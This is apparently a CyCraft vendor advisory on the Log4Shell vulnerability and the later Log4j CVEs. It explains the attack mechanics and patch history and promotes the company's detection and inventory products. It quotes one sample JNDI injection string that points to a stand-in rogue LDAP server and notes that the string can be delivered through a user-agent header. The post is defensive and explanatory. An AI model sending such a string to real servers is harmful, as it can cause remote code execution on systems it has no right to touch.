CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested. Our CyCraft MDR customers can monitor their internal network attack activities generated by attackers exploiting vulnerabilities as well as seek assistance from our AI analysts in inventorying which endpoints (Windows, Linux) or programs are at risk and assessing potential damage. CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.
Within days of the disclosure, there had been countless scans performed by attackers hunting for vulnerable systems and servers around the globe. The most well-known is the Java library called Log4j, which is a framework that provides logging and record management — developed and maintained by the Apache Foundation. Log4j is used in numerous commercial and open-source software products; the scope and extent of the impact are massive.
“[Log4Shell] is the largest and most critical single vulnerability in the past decade, [and may even be] the largest vulnerability in the history of modern computers.”
Amit Yoran, CEO of the network security company Tenable
CVE-2021–44228 can be exploited remotely by unauthenticated attackers to execute arbitrary code (Remote Code Execution, or RCE). For example, an attacker could send a message containing a java naming and directory inventory (JNDI) string, such as ${jndi:ldap://roguedapserver.com/a}, allowing the attacker to execute malicious commands on the host server when the string is logged. An attacker could likewise cause this string to be logged by a server via various other more subtle means, such as renaming their user agent with the string content while visiting a webpage or app, to achieve the same end result. Even websites and apps which do not directly accept user input are vulnerable to Log4Shell attacks.
When the target server receives this connection, it will save the WebLog and execute the malicious commands stored in the Log, then possibly load malicious Java files so that the attacker can directly control the system.
After a busy week of updates, Log4j had been upgraded to Version 2.15. Although it patched vulnerability CVE-2021–44228, industry intelligence reports revealed that the Version 2.15 patch could be bypassed** in certain non-default configurations where JNDI Lookup is turned on. Hence, the CVSS rating of CVE-2021–45046 escalated from 3.7 to 9.0, going from a DoS vulnerability to RCE.
**This bypass uses an SSRF bypass technique introduced in this Black Hat talk.
However, a DoS issue has appeared in Log4j 2.16 (CVE-2021–45105). Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups, allowing for attackers with control over Threat Context Map data to cause a DoS attack. This issue was fixed in Log4j 2.17.0 and 2.12.3.
CyCraft AIR hunts malicious behavior and known tactics and techniques of active and emerging threats rather than utilize block/allow signature-based lists or specific exploits. CyCraft AIR uniquely provides 24/7/365 coverage across your entire network via autonomous systems and human-AI collaboration.
CyCraft AI analysts leverage machine learning to detect, validate, and contain both known and unknown malware and threats. The CyCraft AIR sensor scans endpoints within your local network and in the cloud across Windows, Linux, and macOS environments. In addition to having already successfully detected and prevented attacks exploiting the Log4j2 vulnerability, CyCraft AIR has also proven to be highly effective in protecting both large and small organizations against advanced ransomware, cryptomining malware, Trojans, and botnets.
Above, CyCraft AIR successfully detected, validated, and contained malicious activity exploiting the Log4Shell vulnerability; thus preventing further malicious activity occurring on both the targeted endpoint and system. With each successful detection, validation, and containment, CyCraft AIR enhances its existing detection and response capabilities, providing the CyCraft Community at large with more effective and efficient coverage.
Most asset inventory systems do not support JAR analysis, so it is difficult to inventory Log4j versions on a large scale.
JAR inventory is extremely difficult for current IT due to traditional IT software inventory tools installing components or system packages based on MSI. However, JAR files are Java Application-level packages (not a formal system registration component) that cannot be analyzed by asset software. In order to be able to comply with the software bill of materials (SBOM), the CyCraft MDR can analyze the Java Process on the system and can accurately assist customers in inventorying internal Log4j versions as well as more accurately calculate potential impact:
CyCraft Customers can prevent cyber intrusions from escalating into business-altering incidents. From endpoint to network, from investigation to blocking, from in-house to cloud, CyCraft AIR covers all aspects required to provide small, medium, and large organizations with the proactive, intelligent, and adaptable security solutions needed to defend from all manner of both existing and emerging security threats with real-time protection and visibility across the organization.
Whether it’s on Windows, Linux, or macOS, CyCraft AIR leverages autonomous behavioral detection systems and human-AI collaboration to protect the CyCraft Community from both known active threats and unknown emerging threats.
Writer: CyCraft
CyCraft is a cybersecurity company founded in 2017, focusing on autonomous AI technology. Headquartered in Taiwan, it has subsidiaries in Japan and Singapore. CyCraft provides professional cybersecurity services to government agencies, police and defense forces, banks, and high-tech manufacturers throughout the Asia-Pacific region. It has received strong backing from the CID Group and Pavilion Capital, a Temasek Holdings Private Limited subsidiary.